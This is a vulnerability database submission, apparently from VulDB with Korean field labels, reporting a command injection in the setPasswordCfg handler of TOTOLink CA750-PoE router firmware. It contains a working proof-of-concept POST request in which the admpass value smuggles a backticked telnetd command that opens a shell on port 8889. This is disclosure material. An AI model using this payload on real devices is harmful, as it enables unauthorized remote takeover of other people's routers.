| 제목 | TOTOLink CA750-PoE V6.2c.510 Command Injection |
|---|
| 설명 | We found an Command Injection vulnerability in TOTOLink router with firmware which was released recently, allows remote attackers to execute arbitrary OS commands from a crafted request.In setPasswordCfg function, admuser、admpass is directly passed by the attacker, so we can control the admuser、admpass to attack the OS.
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.33
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 96
Origin: http://192.168.0.33
Connection: keep-alive
Referer: http://192.168.0.33/adm/password.asp?timestamp=1777255971316
Cookie: SESSION_ID=2:1777255848:2
{"topicurl":"setting/setPasswordCfg","admuser":"admin","admpass":"`telnetd -l /bin/sh -p 8889`"} |
|---|
| 원천 | ⚠️ https://github.com/wudipjq/my_vuln/blob/main/totolink4/vuln_50/50.md |
|---|
| 사용자 | Buoy_yes (UID 97629) |
|---|
| 제출 | 2026. 04. 27. AM 08:26 (1 월 ago) |
|---|
| 모더레이션 | 2026. 05. 25. PM 05:09 (28 days later) |
|---|
| 상태 | 수락 |
|---|
| VulDB 항목 | 365512 [Totolink CA750-PoE 6.2c.510 Setting /cgi-bin/cstecgi.cgi setPasswordCfg admuser/admpass 권한 상승] |
|---|
| 포인트들 | 20 |
|---|